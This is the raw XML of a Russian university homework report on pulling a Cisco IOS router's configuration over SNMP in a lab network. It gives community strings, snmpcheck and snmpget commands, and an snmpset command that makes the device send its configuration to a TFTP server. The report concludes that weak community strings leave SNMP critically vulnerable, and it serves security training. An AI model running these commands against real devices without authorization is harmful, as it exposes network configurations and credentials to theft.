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5FA" w:rsidRPr="003555FA" w:rsidRDefault="003555FA" w:rsidP="003555FA">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Федеральное государственное автономное образовательное учреждение </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003555FA" w:rsidRPr="003555FA" w:rsidRDefault="003555FA" w:rsidP="003555FA">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">высшего образования </w:t>
      </w:r>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">«Национальный исследовательский университет </w:t>
      </w:r>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:br/>
        <w:t>«Высшая школа экономики»</w:t>
      </w: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  <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Московский институт электроники и математики им. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>А.Н.Тихонова</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="003555FA" w:rsidRPr="003555FA" w:rsidRDefault="003555FA" w:rsidP="003555FA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"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szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Направление подготовки</w:t>
      </w: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  <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>«10.03.01 Информационная безопасность»</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003555FA" w:rsidRPr="003555FA" w:rsidRDefault="003555FA" w:rsidP="003555FA">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Образовательная программа </w:t>
      </w:r>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>«Информационная безопасность»</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003555FA" w:rsidRPr="003555FA" w:rsidRDefault="003555FA" w:rsidP="003555FA">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"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  <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">О Т Ч Е Т </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003555FA" w:rsidRPr="003555FA" w:rsidRDefault="003555FA" w:rsidP="003555FA">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">По </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>ДЗ</w:t>
      </w:r>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> «</w:t>
      </w:r>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Домен задания: </w:t>
      </w:r>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SNMP</w:t>
      </w:r>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>‑доступ к сетевому устройству.</w:t>
      </w:r>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003555FA" w:rsidRPr="003555FA" w:rsidRDefault="003555FA" w:rsidP="003555FA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b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</w:p>
    <w:p w:rsidR="003555FA" w:rsidRPr="003555FA" w:rsidRDefault="003555FA" w:rsidP="003555FA">
      <w:pPr>
        <w:ind w:left="6379"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Проверил:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003555FA" w:rsidRPr="003555FA" w:rsidRDefault="003555FA" w:rsidP="003555FA">
      <w:pPr>
        <w:ind w:left="6379"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">преп. </w:t>
      </w:r>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Г</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Шастин</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003555FA" w:rsidRPr="003555FA" w:rsidRDefault="003555FA" w:rsidP="003555FA">
      <w:pPr>
        <w:ind w:left="6379"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Подпись _____________</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003555FA" w:rsidRPr="003555FA" w:rsidRDefault="003555FA" w:rsidP="003555FA">
      <w:pPr>
        <w:ind w:left="6379"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Выполнил:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003555FA" w:rsidRPr="003555FA" w:rsidRDefault="003555FA" w:rsidP="003555FA">
      <w:pPr>
        <w:ind w:left="6379"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Новиков В. С. МКБ 241</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003555FA" w:rsidRPr="003555FA" w:rsidRDefault="003555FA" w:rsidP="003555FA">
      <w:pPr>
        <w:ind w:left="6379"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Подпись _____________</w:t>
      </w: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</w:p>
    <w:p w:rsidR="003555FA" w:rsidRPr="003555FA" w:rsidRDefault="003555FA" w:rsidP="003555FA">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Москва, 2025</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D6E3A" w:rsidRPr="003555FA" w:rsidRDefault="003555FA">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1. Вве</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>дение</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D6E3A" w:rsidRPr="003555FA" w:rsidRDefault="003555FA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Цель работы — получить конфигурацию сетевого устройства </w:t>
      </w:r>
      <w:r>
        <w:t>Cisco</w:t>
      </w:r>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>IOS</w:t>
      </w:r>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> через протокол </w:t>
      </w:r>
      <w:r>
        <w:t>SNMP</w:t>
      </w:r>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">используя найденные </w:t>
      </w:r>
      <w:r>
        <w:t>community</w:t>
      </w:r>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">строки: </w:t>
      </w:r>
      <w:r>
        <w:t>read</w:t>
      </w:r>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>write</w:t>
      </w:r>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:t>secret</w:t>
      </w:r>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:t>write</w:t>
      </w:r>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">. Дополнительно имеется </w:t>
      </w:r>
      <w:r>
        <w:t>FTP</w:t>
      </w:r>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>TFTP</w:t>
      </w:r>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>сервер по адресу 10.2.100.110 для выгрузки конфигурации.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D6E3A" w:rsidRDefault="003555FA">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:t>2. Исходные данные</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D6E3A" w:rsidRDefault="003555FA">
      <w:r>
        <w:t>- Устройство Cisco IOS — 10.2.100.10</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>- SNMP Read‑Only community: public</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>SNMP Read‑Write community: secret_write</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>- FTP/TFTP‑сервер: 10.2.100.110</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>- Инструменты: snmpcheck, snmpset</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D6E3A" w:rsidRPr="003555FA" w:rsidRDefault="003555FA">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>3. Порядок действий</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D6E3A" w:rsidRPr="003555FA" w:rsidRDefault="003555FA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Шаг 1. Проверка доступности </w:t>
      </w:r>
      <w:r>
        <w:t>SNMP</w:t>
      </w:r>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>snmpcheck</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D6E3A" w:rsidRDefault="003555FA">
      <w:r>
        <w:t>Команда:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>snmpcheck</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -t 10.2.100.10 -c public</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D6E3A" w:rsidRDefault="003555FA">
      <w:r>
        <w:t>Шаг 2. Проверка RW‑доступа:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D6E3A" w:rsidRDefault="003555FA">
      <w:r>
        <w:t>Команда:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve"> s</w:t>
      </w:r>
      <w:r>
        <w:t>nmpcheck -t 10.2.100.10 -c secret_write</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D6E3A" w:rsidRPr="003555FA" w:rsidRDefault="003555FA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Шаг 3. Чтение конфигурации через </w:t>
      </w:r>
      <w:r>
        <w:t>SNMP</w:t>
      </w:r>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>OID</w:t>
      </w:r>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D6E3A" w:rsidRPr="003555FA" w:rsidRDefault="003555FA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>OID</w:t>
      </w:r>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> конфигурации для </w:t>
      </w:r>
      <w:r>
        <w:t>Cisco</w:t>
      </w:r>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>: 1.3.6.1.4.1.9.2.1.53.0</w:t>
      </w:r>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:br/>
        <w:t>Команда:</w:t>
      </w:r>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>snmpget</w:t>
      </w:r>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r>
        <w:t>v</w:t>
      </w:r>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10.2.100.10 1.3.6.1.4.1.9.2.1.53.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D6E3A" w:rsidRPr="003555FA" w:rsidRDefault="003555FA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Шаг 4. Передача конфигурации на </w:t>
      </w:r>
      <w:r>
        <w:t>TFTP</w:t>
      </w:r>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D6E3A" w:rsidRDefault="003555FA">
      <w:r>
        <w:t xml:space="preserve">OID для запуска </w:t>
      </w:r>
      <w:r>
        <w:t>TFTP передачи:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>1.3.6.1.4.1.9.2.1.55.&lt;ip_address&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Команда:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve"> snmpset -v2c -c secret_write 10.2.100.10 1.3.6.1.4.1.9.2.1.55.10.2.100.110 s config.cfg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D6E3A" w:rsidRPr="003555FA" w:rsidRDefault="003555FA">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>4. Результат</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D6E3A" w:rsidRPr="003555FA" w:rsidRDefault="003555FA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">В результате выполнения команд конфигурация </w:t>
      </w:r>
      <w:r>
        <w:t>Cisco</w:t>
      </w:r>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> была выгружена на </w:t>
      </w:r>
      <w:r>
        <w:t>TFTP</w:t>
      </w:r>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>сервер 10.2.100.110 и м</w:t>
      </w:r>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">ожет быть просмотрена в файле </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>config</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cfg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D6E3A" w:rsidRPr="003555FA" w:rsidRDefault="003555FA">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>5. Выводы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D6E3A" w:rsidRDefault="003555FA">
      <w:r>
        <w:t>SNMP</w:t>
      </w:r>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">доступ с </w:t>
      </w:r>
      <w:r>
        <w:t>RW</w:t>
      </w:r>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r>
        <w:t>community</w:t>
      </w:r>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> позволяет полностью управлять устройством </w:t>
      </w:r>
      <w:r>
        <w:t>Cisco</w:t>
      </w:r>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>IOS</w:t>
      </w:r>
      <w:r w:rsidRPr="003555FA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, включая экспорт конфигурации. </w:t>
      </w:r>
      <w:r>
        <w:t>SNMP является критически уязвимым, если используется слабый community‑string.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="006D6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5FA"/>
    <w:rsid w:val="006D6E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6A861"/>
  <w14:defaultImageDpi w14:val="300"/>
  <w15:docId w15:val="{5EE93E22-7FB5-4C94-AA48-91C40436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3555FA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3555F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492FCF-91C4-46F1-A595-AD1FD4E1D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vit81</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-12-23T23:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-30T14:32:00Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>